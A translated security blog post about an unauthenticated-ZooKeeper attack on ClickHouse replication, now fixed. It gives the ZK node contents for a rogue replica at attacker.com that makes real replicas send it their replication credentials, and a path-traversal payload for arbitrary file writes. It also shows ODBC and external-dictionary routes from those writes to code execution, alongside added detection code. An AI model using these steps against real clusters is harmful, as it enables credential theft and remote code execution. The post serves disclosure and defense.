Why you should close your zoos

This article tells the story of a rather specific vulnerability in the ClickHouse replication protocol and also shows how the attack surface can be expanded.

ClickHouse is a database for storing large volumes of data, and it is most often run with more than one replica. Clustering and replication in ClickHouse are built on top of Apache ZooKeeper (ZK) and require write access to it.

A default ZK installation requires no authentication, so thousands of ZK servers used to configure Kafka, Hadoop and ClickHouse are simply exposed to the public.

To reduce your attack surface, you should configure authentication and authorization when installing ZooKeeper.

There are some 0-days in Java deserialization, but let's imagine that an attacker can read from and write to the ZooKeeper used for ClickHouse replication.

When configured in cluster mode, ClickHouse supports distributed DDL queries, which go through ZK; for them, nodes are created under the /clickhouse/task_queue/ddl branch.

For example, you create a node /clickhouse/task_queue/ddl/query-0001 with the content:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

and after that the table is dropped on the cluster hosts host1 and host2. Distributed DDL also supports running CREATE/ALTER/DROP queries.

Sounds scary? But where would an attacker get the server addresses?

ClickHouse replication works at the level of individual tables, so when a table is created, a server is registered in ZK that will be responsible for exchanging metadata with the other replicas. For example, when executing the following query (ZK must be configured; chXX is the replica name, foobar is the table name):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

the columns and metadata nodes are created.

Content of /clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Can data be dumped from this cluster? Yes, if the replication port (TCP/9009) on the server chXX-address is not closed by a firewall and no authentication is configured for replication. How does one get around authentication?

An attacker can create a new replica in ZK by simply copying the contents of /clickhouse/tables/01-01/foobar/replicas/chXX and changing the host value.

Content of /clickhouse/tables/01-01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Then the other replicas need to be told that there is a new block of data on the attacker's server which they must fetch: a node /clickhouse/tables/01-01/foobar/log/log-00000000XX is created in ZK (XX is a monotonically increasing counter and must be greater than the last entry in the event log):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

where source replica is the name of the attacker's replica created in the previous step, block_id is the data block identifier, and get is the "get block" command (there are commands for other operations as well).

Next, each replica reads the new event from the log and goes to the attacker-controlled server to fetch the data block (the replication protocol is binary and runs over HTTP). The server attacker.com receives the request:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

where XXX is the replication authentication data. In some cases this may be an account that also has access to the database via the native ClickHouse protocol and the HTTP protocol. As you can see, the attack surface becomes quite large simply because the ZooKeeper used for replication was left without authentication configured.
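The two ZK artefacts the attack leaves behind, a replica whose host is not part of the cluster inventory and log entries that point at it, can be audited from a ZK snapshot. The following is an added example, not code from the article or from ClickHouse; the snapshot, the replica inventory and the path layout are constructed from the node formats shown above.

```python
import re

# Constructed ZooKeeper snapshot (not real data): node path -> node contents,
# in the formats the article shows for replica "host" nodes and log entries.
# The "attacker" replica is a copy of ch01's entry with the host changed.
ZK_SNAPSHOT = {
    "/clickhouse/tables/01-01/foobar/replicas/ch01/host":
        "host: ch01-address\nport: 9009\ntcp_port: 9000\n"
        "database: default\ntable: foobar\nscheme: http\n",
    "/clickhouse/tables/01-01/foobar/replicas/attacker/host":
        "host: attacker.com\nport: 9009\ntcp_port: 9000\n"
        "database: default\ntable: foobar\nscheme: http\n",
    "/clickhouse/tables/01-01/foobar/log/log-0000000041":
        "format version: 4\ncreate_time: 2019-07-31 09:30:00\n"
        "source replica: ch01\nblock_id: all_1_1\nget\nall_0_0_1\n",
    "/clickhouse/tables/01-01/foobar/log/log-0000000042":
        "format version: 4\ncreate_time: 2019-07-31 09:37:42\n"
        "source replica: attacker\nblock_id: all_2_2\nget\nall_0_0_2\n",
}

# Assumed cluster inventory: the only hosts allowed to act as replicas.
EXPECTED_REPLICA_HOSTS = {"ch01-address", "ch02-address"}

HOST_NODE = re.compile(r"^(?P<table>/clickhouse/tables/[^/]+/[^/]+)/replicas/(?P<replica>[^/]+)/host$")
LOG_NODE = re.compile(r"^(?P<table>/clickhouse/tables/[^/]+/[^/]+)/log/(?P<entry>log-\d+)$")


def parse_fields(text):
    """Turn 'key: value' lines into a dict; bare lines such as 'get' are ignored."""
    return dict(line.split(": ", 1) for line in text.splitlines() if ": " in line)


def audit(snapshot, allowed_hosts):
    """Return (rogue replicas, tainted log entries): replicas whose host is not
    in the inventory, and log entries whose source replica is one of them, i.e.
    entries that would send every replica to a foreign host for a part."""
    rogue = set()
    for path, text in snapshot.items():
        m = HOST_NODE.match(path)
        if m and parse_fields(text).get("host") not in allowed_hosts:
            rogue.add((m["table"], m["replica"]))
    tainted = []
    for path, text in snapshot.items():
        m = LOG_NODE.match(path)
        if m and (m["table"], parse_fields(text).get("source replica")) in rogue:
            tainted.append(m["entry"])
    return sorted(rogue), sorted(tainted)
```

Running the audit on the snapshot reports the attacker replica and the log entry that points at it, which is the signal to raise before any replica performs the fetch.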

Let's look at the function that fetches a data block from a replica. It was written with complete confidence that all replicas are under our control and trust each other.

[Figure: replication handler code]

The function reads the number of files, then each file's name, size and contents, and writes them to the file system. It is worth describing separately how data is laid out on the file system.

There are several subdirectories in /var/lib/clickhouse (the default storage directory from the config file):

flags - directory for writing flags used during recovery after data loss;
tmp - directory for temporary files;
user_files - file operations in queries are restricted to this directory (INTO OUTFILE and others);
metadata - sql files with table definitions;
preprocessed_configs - processed derived configuration files from /etc/clickhouse-server;
data - the directory with the data itself; a separate subdirectory is created here for each database (for example /var/lib/clickhouse/data/default).

For each table, a subdirectory is created in the database directory. Each column is a separate file in the engine's format. For example, for the foobar table created by the attacker, the following files are created:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

The replica receives files with these same names when processing a data block and does not validate them in any way.

The attentive reader has probably already noticed the unsafe concatenation of file_name in the call to WriteBufferFromFile. Yes, this lets an attacker write arbitrary content to any file on the FS with the permissions of the clickhouse user. To do so, the attacker-controlled replica must return the following response to the request (line breaks added for readability):

\x01
\x00\x00\x00\x00\x00\x00\x00\x24
../../../../../../../../../tmp/pwned
\x12\x00\x00\x00\x00\x00\x00\x00
hellofromzookeeper

and after the concatenation with ../../../../../../../../../tmp/pwned, the file /tmp/pwned is written with the content hellofromzookeeper.
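The missing check is a validation of each received file name before it is joined to the part directory. The block below is an added example, not ClickHouse's code: it parses a response in the simplified framing shown above (assumed here as a 1-byte file count, then per file an 8-byte little-endian name length, the name, an 8-byte little-endian size and the contents; the real wire format differs in details) and screens the names the way a hardened handler would. The part directory path and the expected-name pattern are assumptions.

```python
import posixpath
import re
import struct

# File names a part directory is expected to contain: column files (.bin/.mrk2)
# and the part metadata files listed above. Anything else is rejected.
EXPECTED_NAME = re.compile(r"^[A-Za-z0-9_]+\.(bin|mrk2|txt|idx)$")


def frame_response(files):
    """Build a response in the assumed framing (count byte, then per file:
    u64 name length, name, u64 size, contents; little-endian lengths)."""
    out = bytes([len(files)])
    for name, data in files:
        raw = name.encode()
        out += struct.pack("<Q", len(raw)) + raw + struct.pack("<Q", len(data)) + data
    return out


def parse_response(payload):
    """Inverse of frame_response; raises ValueError on a truncated payload."""
    if not payload:
        raise ValueError("empty payload")
    pos, files = 1, []
    for _ in range(payload[0]):
        if pos + 8 > len(payload):
            raise ValueError("truncated payload")
        (name_len,) = struct.unpack_from("<Q", payload, pos)
        name = payload[pos + 8:pos + 8 + name_len]
        pos += 8 + name_len
        if len(name) != name_len or pos + 8 > len(payload):
            raise ValueError("truncated payload")
        (size,) = struct.unpack_from("<Q", payload, pos)
        data = payload[pos + 8:pos + 8 + size]
        pos += 8 + size
        if len(data) != size:
            raise ValueError("truncated payload")
        files.append((name.decode("utf-8", "replace"), data))
    return files


def is_safe_part_file(name, part_dir="/var/lib/clickhouse/data/default/foobar/all_0_0_2"):
    """Accept only an expected file name, and only if joining it to the part
    directory still resolves inside that directory (the check that was missing)."""
    if not EXPECTED_NAME.match(name):
        return False
    target = posixpath.normpath(posixpath.join(part_dir, name))
    return posixpath.dirname(target) == posixpath.normpath(part_dir)


def screen_response(payload):
    """Return (accepted, rejected) file names for a replica's response."""
    accepted, rejected = [], []
    for name, _data in parse_response(payload):
        (accepted if is_safe_part_file(name) else rejected).append(name)
    return accepted, rejected


# Constructed sample: one legitimate file plus the traversal name from the article.
SAMPLE = frame_response([
    ("columns.txt", b"columns format version: 1\n"),
    ("../../../../../../../../../tmp/pwned", b"hellofromzookeeper"),
])
```

A handler that calls screen_response before touching the file system writes columns.txt into the part directory and drops the traversal entry instead of creating /tmp/pwned.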

There are several ways to turn this arbitrary file write into remote code execution (RCE).

External dictionaries to RCE

In older versions, the ClickHouse configuration directory was by default owned by the clickhouse user. The configuration files are XML files that the service reads at startup and caches in /var/lib/clickhouse/preprocessed_configs; when they change, they are re-read. With write access to /etc/clickhouse-server, an attacker can create their own external dictionary of the executable type and then run arbitrary code. Current versions of ClickHouse do not grant these permissions by default, but if the server was upgraded from an older version, those permissions remain. If you maintain a ClickHouse cluster, check the permissions on the configuration directory; it should belong to the root user.

ODBC to RCE

When the package is installed, a clickhouse user is created, but its home directory /nonexistent is not. However, when using external dictionaries, or for other reasons, administrators create the /nonexistent directory and give the clickhouse user write access to it (SSZB! translator's note).

ClickHouse supports ODBC and can connect to other databases. In ODBC you can specify the path to the database driver library (.so). Older versions of ClickHouse allowed this directly in the query handler, but now a much stricter check of the connection string has been added to odbc-bridge, so the driver path can no longer be set from a query. But what if the attacker can write to the home directory using the vulnerability described above?

Create a ~/.odbc.ini file with content like this:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

then run SELECT * FROM odbc('DSN=lalala', 'test', 'test'); the test.so library is loaded and we get RCE (thanks to buglloc for the tip).

These and other vulnerabilities were fixed in ClickHouse version 19.14.3. Keep an eye on your ClickHouses and ZooKeepers!

Source: will.com
